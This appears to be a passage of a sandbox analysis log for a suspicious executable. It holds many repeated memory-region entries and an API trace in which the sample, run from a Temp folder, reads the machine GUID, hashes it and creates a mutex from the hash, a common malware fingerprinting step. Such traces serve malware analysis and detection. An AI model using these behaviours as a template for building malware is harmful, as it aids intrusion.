0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1693 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1694 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1695 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1696 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1697 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1698 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1699 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1700 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1701 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1702 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1703 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1704 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1705 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1706 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1707 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1708 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1709 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1710 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1711 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1712 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1713 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1714 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1715 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1716 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1717 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1718 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1719 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1720 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1721 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1722 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1723 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1724 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1725 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1726 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1727 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1728 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1729 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1730 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1731 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1732 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1733 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1734 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1735 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1736 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1737 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1738 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1739 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1740 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1741 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1742 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1743 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1744 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1745 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1746 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1747 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1748 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1749 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1750 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1751 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1752 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1753 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1754 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1755 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1756 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1757 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1758 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1759 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1760 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1761 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1762 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1763 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1764 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1765 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1766 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1767 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1768 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1769 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1770 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1771 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1772 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1773 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1774 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1775 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1776 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1777 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1778 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1779 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1780 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1781 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1782 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1783 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1784 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1785 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1786 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1787 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1788 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1789 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1790 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1791 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1792 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1793 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1794 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1795 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1796 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1797 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1798 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1799 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1800 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1801 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1802 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1803 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1804 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1805 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1806 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1807 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1808 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1809 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1810 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1811 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1812 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1813 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1814 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1815 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1816 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1817 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1818 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1819 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1820 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1821 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1822 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1823 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1824 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1825 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1826 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1827 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1828 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1829 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1830 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1831 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1832 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1833 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1834 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1835 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1836 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1837 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1838 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1839 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1840 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1841 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1842 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1843 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1844 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1845 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1846 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1847 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1848 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1849 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1850 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1851 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1852 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1853 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1854 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1855 start_va = 0x4b0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1856 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Thread: id = 8 os_tid = 0x9c8 [0143.815] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" [0143.842] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0143.870] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb", pNumArgs=0x19ff7c | out: pNumArgs=0x19ff7c) returned 0x697e90*="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" [0143.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0143.871] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe", lpSrch="-u") returned 0x0 [0143.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0143.872] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb", lpSrch="-u") returned 0x0 [0143.873] SetErrorMode (uMode=0x3) returned 0x0 [0143.874] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x76bf0000 [0143.874] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x76c90000 [0143.875] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x767c0000 [0143.904] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fd7c | out: lpWSAData=0x19fd7c) returned 0 [0143.913] GetProcessHeap () returned 0x690000 [0143.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6a3da8 [0143.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0143.914] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fedc | out: phkResult=0x19fedc*=0x178) returned 0x0 [0143.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0143.916] RegQueryValueExA (in: hKey=0x178, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x6a3da8, lpcbData=0x19fed8*=0x208 | out: lpType=0x0, lpData=0x6a3da8*=0x30, lpcbData=0x19fed8*=0x25) returned 0x0 [0143.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0143.917] RegCloseKey (hKey=0x178) returned 0x0 [0143.917] GetProcessHeap () returned 0x690000 [0143.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x69b728 [0143.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0143.918] CryptAcquireContextW (in: phProv=0x19febc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19febc*=0x6964d0) returned 1 [0144.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0144.583] CryptCreateHash (in: hProv=0x6964d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x19fec0 | out: phHash=0x19fec0) returned 1 [0144.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0144.585] CryptHashData (hHash=0x69d668, pbData=0x6a3da8, dwDataLen=0x24, dwFlags=0x0) returned 1 [0144.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0144.586] CryptGetHashParam (in: hHash=0x69d668, dwParam=0x2, pbData=0x69b728, pdwDataLen=0x19feb8, dwFlags=0x0 | out: pbData=0x69b728, pdwDataLen=0x19feb8) returned 1 [0144.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0144.587] CryptDestroyHash (hHash=0x69d668) returned 1 [0144.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0144.588] CryptReleaseContext (hProv=0x6964d0, dwFlags=0x0) returned 1 [0144.588] GetProcessHeap () returned 0x690000 [0144.588] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x31) returned 0x69d2a8 [0144.588] GetProcessHeap () returned 0x690000 [0144.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b728 | out: hHeap=0x690000) returned 1 [0144.589] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69d2a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0144.589] GetProcessHeap () returned 0x690000 [0144.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x42) returned 0x696740 [0144.589] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69d2a8, cbMultiByte=-1, lpWideCharStr=0x696740, cchWideChar=33 | out: lpWideCharStr="B7274519EDDE9BDC8AE51348A4AEC640") returned 33 [0144.589] GetProcessHeap () returned 0x690000 [0144.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x64) returned 0x6964d0 [0144.589] GetProcessHeap () returned 0x690000 [0144.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x696740 | out: hHeap=0x690000) returned 1 [0144.590] GetProcessHeap () returned 0x690000 [0144.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69d2a8 | out: hHeap=0x690000) returned 1 [0144.591] GetProcessHeap () returned 0x690000 [0144.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3da8 | out: hHeap=0x690000) returned 1 [0144.591] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="B7274519EDDE9BDC8AE51348") returned 0x180 [0144.591] GetLastError () returned 0x0 [0144.591] GetProcessHeap () returned 0x690000 [0144.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1388) returned 0x6a4fc8 [0144.592] GetProcessHeap () returned 0x690000 [0144.592] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b728 [0144.635] GetProcessHeap () returned 0x690000 [0144.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, 